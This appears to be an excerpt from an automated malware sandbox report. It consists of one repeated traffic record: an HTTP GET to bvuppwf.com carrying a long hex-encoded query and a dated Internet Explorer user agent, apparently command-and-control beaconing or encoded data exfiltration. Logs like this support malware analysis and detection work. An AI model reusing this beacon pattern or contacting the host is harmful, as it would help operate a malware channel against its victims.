        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
